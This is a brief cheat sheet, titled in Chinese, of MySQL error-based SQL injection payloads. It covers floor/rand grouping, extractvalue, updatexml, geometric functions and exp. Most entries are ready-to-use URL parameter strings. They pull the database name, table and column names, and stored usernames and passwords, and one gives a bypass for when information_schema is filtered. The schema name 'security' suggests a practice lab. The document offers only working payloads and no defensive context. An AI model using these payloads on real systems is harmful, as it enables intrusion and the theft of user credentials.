sql报错注入函数

#1.floor()
#数据尾部多一个1
#?id=1'and (select count(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)))--+
#?id=1' union select 1,2,count(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)) --+
#?id=1'and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
#过滤information_schema
#?id=1'and (select count(*) from (select 1 union select null union select !1)a group by concat(database(), floor(rand(0)*2)))--+
# 2.extractvalue()
#?id=1' and (select * from dat where id=1 and extractvalue(1,concat(0x7e,(select database()))))--+
# 3.updatexml()
#?id=1' and 1=(updatexml(1,concat(0x7e,(select database()),0x7e),1))--+
#?id=1' and updatexml(1,concat(0x7e,(select database())),1)--+
#?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 0,1)),1)--+
#?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),1)--+
#?id=1' and updatexml(1,concat(0x7e,(select concat(password,username) from security.users limit 0,1)),1)--+
# 4.geometrycollection()#fail,Illegal non geometric
# geometrycollection((select * from(select * from(select database())a)b))
# 5.multipoint()
# ?id=1'and (select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)))--+
# 6.polygon()
# select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
# 7.multipolygon()
# select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
# 8.linestring()
# select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
# 9.multilinestring()
# select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
# 10.exp()
# select * from test where id=1 and exp(~(select * from(select user())a));